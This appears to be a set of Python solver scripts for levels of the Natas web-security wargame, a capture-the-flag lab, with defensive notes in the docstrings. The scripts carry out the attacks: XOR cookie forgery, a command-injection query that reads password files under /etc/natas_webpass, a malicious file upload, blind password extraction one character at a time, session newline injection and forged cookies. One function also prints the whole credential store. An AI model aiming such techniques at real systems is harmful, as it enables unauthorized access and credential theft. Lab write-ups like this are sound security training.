def main():
    """Derive the cookie XOR key, forge a cookie and store the natas12 password.

    The decoded ``data`` cookie is XORed with DEFAULT_JSON, its known
    plaintext, which yields the repeating key stream; ``shorten_key``
    (defined elsewhere) presumably reduces it to a single period. MY_JSON is
    then encrypted with that key and sent back as the cookie.

    Defensive takeaway: a repeating-key XOR over a predictable plaintext
    gives neither confidentiality nor integrity. Client-held state needs a
    keyed MAC (or server-side storage) instead.

    NOTE(review): relies on Python 2 ``str`` semantics for ``b64encode`` and
    for matching a ``str`` pattern against ``response.content``.
    """
    basic_token = base64.b64encode('%s:%s' % (USER, PASSWORD))

    # The cookie value arrives URL-encoded; restore the base64 padding first.
    raw_cookie = get_cookie(basic_token)
    ciphertext = base64.b64decode(raw_cookie.replace('%3D', '='))

    # Known plaintext XOR ciphertext gives the key repeated over the length.
    key = shorten_key(xor_encrypt(ciphertext, DEFAULT_JSON))
    print('key found: %s' % key)

    forged_cookie = base64.b64encode(xor_encrypt(MY_JSON, key))
    response = requests.get(
        URL,
        headers={'Authorization': 'Basic %s' % basic_token},
        cookies={'data': forged_cookie},
    )

    # Keep the last occurrence, as the original loop did.
    hits = [m.group(1) for m in
            re.finditer(r"natas12 is (\w+)", response.content, re.MULTILINE)]
    password = hits[-1] if hits else None
    if password is None:
        return
    print('password found: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas12', password)
    print('done')
def main():
    """Send QUERY as the ``needle`` parameter and store the natas11 password.

    The response body is searched for a ``/etc/natas_webpass/natas11:<word>``
    line; the last captured word is saved as the natas11 credential. Nothing
    is printed or saved when the pattern does not occur.
    """
    token = base64.b64encode('%s:%s' % (USER, PASSWORD))
    response = requests.get(
        URL,
        headers=dict(Authorization='Basic %s' % token),
        params=dict(needle=QUERY),
    )

    pattern = r"\/etc\/natas_webpass\/natas11:(\w+)"
    captured = [m.group(1)
                for m in re.finditer(pattern, response.content, re.MULTILINE)]
    if not captured:
        return

    password = captured[-1]  # last match wins, as in the original loop
    print('found password: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas11', password)
    print('done')
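def main():
    """Upload PAYLOAD, then read the natas13 password via the stored file.

    Posts the pre-built multipart body to ``index.php``, extracts the path of
    the stored file from the ``href`` in the response, requests that path and
    saves the response body (newlines removed) as the natas13 credential.

    Returns early, without saving anything, when no uploaded file path is
    found in the response.
    """
    token = base64.b64encode('%s:%s' % (USER, PASSWORD))
    upload = requests.post(
        '%sindex.php' % URL,
        headers={
            'Authorization': 'Basic %s' % token,
            # Presumably the same boundary string used inside PAYLOAD
            # (defined elsewhere) -- confirm before changing either.
            'Content-Type': 'multipart/form-data; boundary=---------------------------208637385607827912102593443',
        },
        data=PAYLOAD,
    )

    filename = None
    for hit in re.finditer(r"href=\"(\w+\/\w+\.php)\"", upload.content,
                           re.MULTILINE):
        filename = hit.group(1)  # keep the last link found

    if filename is None:
        print('failed to find filename')
        # The original had a bare `exit`, which only references the name and
        # never stops execution, so the code went on to request "<URL>None".
        return

    print('%s was uploaded succesfully' % filename)
    fetched = requests.get(
        '%s%s' % (URL, filename),
        headers={'Authorization': 'Basic %s' % token},
    )
    password = fetched.content.replace('\n', '')
    print('password found: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas13', password)
    print('done')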
def main():
    """Try candidate values 0..640 with ``do_request`` until one yields a password.

    ``do_request`` (defined elsewhere) returns the password or ``None``.
    Progress is printed every 20 candidates; the first password found is saved
    as the natas20 credential and the search stops.
    """
    for candidate in range(641):
        if not candidate % 20:
            print('requesting: %d' % candidate)

        password = do_request(candidate)
        if password is None:
            continue

        print('found password at %d: %s' % (candidate, password))
        print('adding to credentials....')
        natas.save_credentials('natas20', password)
        print('done')
        break
def main():
    """Fetch URL and store the first ``Password: <word>`` hit as natas25.

    Only the first match is used. Nothing is printed or saved when the page
    contains no match.
    """
    response = requests.get(URL, headers={'Authorization': B64})

    first = next(
        re.finditer(r"Password: (\w+)", response.content, re.MULTILINE),
        None,
    )
    if first is not None:
        print('found password: %s' % first.group(1))
        print('adding to credentials....')
        natas.save_credentials('natas25', first.group(1))
        print('done')
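def main():
    """Read the natas2 password from an HTML comment and store it.

    Authenticates with the stored credential for ``usr``, fetches URL and
    looks for the ``<!--The password for natas2 is ... -->`` comment. The
    first match is saved as the natas2 credential.

    Returns early when the comment is absent. The original left
    ``found_password`` unbound in that case and raised ``NameError`` at the
    first print.

    NOTE(review): relies on Python 2 ``str`` semantics for ``b64encode`` and
    for matching a ``str`` pattern against ``response.content``.
    """
    usr = '******'
    password = natas.get_credential(usr)
    b64 = base64.b64encode('%s:%s' % (usr, password))
    response = requests.get(URL, headers={'Authorization': 'Basic %s' % b64})

    regex = r"<!--The password for natas2 is (\w*?) -->"
    first = next(re.finditer(regex, response.content, re.MULTILINE), None)
    if first is None:
        print('failed to find password')
        return

    found_password = first.group(1)
    print('found password: %s' % found_password)
    print('adding to credentials file....')
    natas.save_credentials('natas2', found_password)
    print('done')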
def main():
    """Fetch URL as USER and store the ``natas3:<word>`` value found there.

    The credential for USER comes from the ``natas`` store. When several
    matches exist, the last one is kept; with no match nothing is saved.
    """
    current_pass = natas.get_credential(USER)
    token = base64.b64encode('%s:%s' % (USER, current_pass))
    response = requests.get(URL, headers=dict(Authorization='Basic %s' % token))

    values = [m.group(1)
              for m in re.finditer(r"natas3:(\w+)", response.content,
                                   re.MULTILINE)]
    if not values:
        return

    password = values[-1]
    print('found password: %s' % password)
    print('adding to credentials file....')
    natas.save_credentials('natas3', password)
    print('done')
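def main():
    """Read ``users.txt`` from the discovered folder and store the natas4 password.

    ``find_folder_name`` (defined elsewhere) supplies the folder component of
    the URL. The file is searched line by line for ``natas4:<word>``; the last
    match is saved as the natas4 credential.

    Returns:
        None. The original unconditionally printed and saved ``None`` when the
        file held no matching line; that path now reports failure and leaves
        the credential store untouched.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
    fldr = find_folder_name(b64)
    response = requests.get('%s%susers.txt' % (URL, fldr),
                            headers={'Authorization': 'Basic %s' % b64})

    regex = r"^natas4:(\w+?)$"
    password = None
    for match in re.finditer(regex, response.content, re.MULTILINE):
        password = match.group(1)

    if password is None:
        # Avoid overwriting a stored credential with None.
        print('failed to find password')
        return None

    print('found password: %s' % password)
    print('adding to credentials file....')
    natas.save_credentials('natas4', password)
    print('done')
    return None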
def main():
    """Recover the natas16 password one character at a time and store it.

    Each round appends every letter and digit in turn to the prefix known so
    far and asks ``guessed_correct`` (defined elsewhere) whether the longer
    prefix is right. The first accepted character is kept; the search ends
    when no character is accepted.

    Defensive takeaway: any endpoint that answers yes/no about a secret
    prefix lets the secret be recovered in linear time. Rate limiting and
    uniform responses are the relevant controls.
    """
    token = base64.b64encode('%s:%s' % (USER, PASSWORD))
    alphabet = string.ascii_letters + string.digits

    password = ''
    while True:
        # Lazy generator: stops calling guessed_correct at the first success.
        longer = next(
            (password + ch for ch in alphabet
             if guessed_correct(password + ch, token)),
            None,
        )
        if longer is None:
            break
        password = longer
        print(password)

    print('found password: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas16', password)
    print('done')
def main():
    """Request URL with a fresh session id and store natas26 from the response.

    The same random string is substituted into URL and sent as the
    ``PHPSESSID`` cookie, together with USER_AGENT. Every response line shaped
    like ``[dd.mm.yyyy hh::mm:ss] <32 word chars>`` is treated as a hit, and
    each hit is saved in turn, so the last one is what remains stored.
    """
    session_id = random_string()
    request_headers = {
        'Authorization': B64,
        'User-Agent': USER_AGENT,
    }
    response = requests.get(
        URL % session_id,
        headers=request_headers,
        cookies={'PHPSESSID': session_id},
    )

    pattern = r"\[\d{2}\.\d{2}\.\d{4}\s\d{2}::\d{2}:\d{2}\]\s(\w{32})"
    for hit in re.finditer(pattern, response.content, re.MULTILINE):
        token = hit.group(1)
        print('found password: %s' % token)
        print('adding to credentials....')
        natas.save_credentials('natas26', token)
        print('done')
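def main():
    """Request URL with ``loggedin=1`` set and store the natas6 password.

    The page is fetched with a client-chosen ``loggedin=1`` cookie and the
    first ``The password for natas6 is <word>`` hit is saved.

    Returns early when the phrase is absent. The original left
    ``found_password`` unbound in that case and raised ``NameError``.

    Defensive takeaway: an authorization decision read from an unsigned,
    client-controlled cookie can be set by any client.
    """
    b64 = base64.b64encode('%s:%s' % (USER, PASSWORD))
    response = requests.get(URL, headers={
        'Authorization': 'Basic %s' % b64,
        'Cookie': 'loggedin=1;'
    })

    regex = r"The password for natas6 is (\w+)"
    first = next(re.finditer(regex, response.content, re.MULTILINE), None)
    if first is None:
        print('failed to find password')
        return

    found_password = first.group(1)
    print('found password: %s' % found_password)
    print('adding to credentials file....')
    natas.save_credentials('natas6', found_password)
    print('done')
    # NOTE(review): this appears to print the whole credential store to
    # stdout; drop it or gate it behind a debug flag so stored secrets do not
    # end up in terminal scrollback or captured logs.
    print('DEBUG: credentials - %s' % natas.get_credentials())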
def main():
    """Submit the login form and store the natas15 password from the reply.

    The form values are redacted in this listing. The last
    ``natas15 is <word>`` hit in the response is saved; with no hit nothing is
    printed or saved.
    """
    token = base64.b64encode('%s:%s' % (USER, PASSWORD))
    form = {
        'username': '******',
        'password': '******',
    }
    response = requests.post(
        URL,
        headers={'Authorization': 'Basic %s' % token},
        data=form,
    )

    found = [m.group(1)
             for m in re.finditer(r"natas15 is (\w+)", response.content,
                                  re.MULTILINE)]
    if not found:
        return

    password = found[-1]  # last match wins, as in the original loop
    print('password found: %s' % password)
    print('adding to credentials....')
    natas.save_credentials('natas15', password)
    print('done')
def main():
    """Decode the published secret, submit it and store the natas9 password.

    ``get_encoded_secret`` and ``decode_secret`` are defined elsewhere; this
    function only chains them, posts the result as ``secret`` and saves the
    last ``The password for natas9 is <word>`` hit from the response.

    Defensive takeaway: a reversible encoding is not a secret-keeping
    mechanism once the encoding routine is visible to the client.
    """
    token = base64.b64encode('%s:%s' % (USER, PASSWORD))
    secret = decode_secret(get_encoded_secret(token))

    response = requests.post(
        URL,
        headers=dict(Authorization='Basic %s' % token),
        data=dict(secret=secret, submit='Submit+Query'),
    )

    pattern = r"The password for natas9 is (\w+)"
    found = [m.group(1)
             for m in re.finditer(pattern, response.content, re.MULTILINE)]
    if not found:
        return

    password = found[-1]
    print('found password: %s' % password)
    print('adding password to credentials....')
    natas.save_credentials('natas9', password)
    print('done')
def main():
    """Post a two-line ``name`` value, reuse the session and store natas21.

    The first request submits a ``name`` containing an embedded newline and
    keeps the ``PHPSESSID`` cookie it receives. The second request replays
    that session id, and the first ``Password: <word>`` hit is saved.

    Defensive takeaway: a line-oriented session format must reject or escape
    newlines in stored values, otherwise a value can introduce extra records.
    """
    injection = 'admin\nadmin 1'
    auth = {'Authorization': B64}

    seeded = requests.post(URL, headers=auth, data={'name': injection})
    cookie = seeded.cookies['PHPSESSID']
    print('cookie: %s' % cookie)

    response = requests.get(URL, headers=auth, cookies={'PHPSESSID': cookie})
    first = next(
        re.finditer(r"Password: (\w+)", response.content, re.MULTILINE),
        None,
    )
    if first is not None:
        print('found password: %s' % first.group(1))
        print('adding to credentials....')
        natas.save_credentials('natas21', first.group(1))
        print('done')